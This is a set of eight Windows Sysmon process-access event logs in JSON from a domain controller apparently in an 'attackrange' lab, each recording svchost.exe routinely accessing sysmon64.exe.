{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1296,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1297,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1298,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1299,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1300,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1301,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1302,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1303,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.111\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.111","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
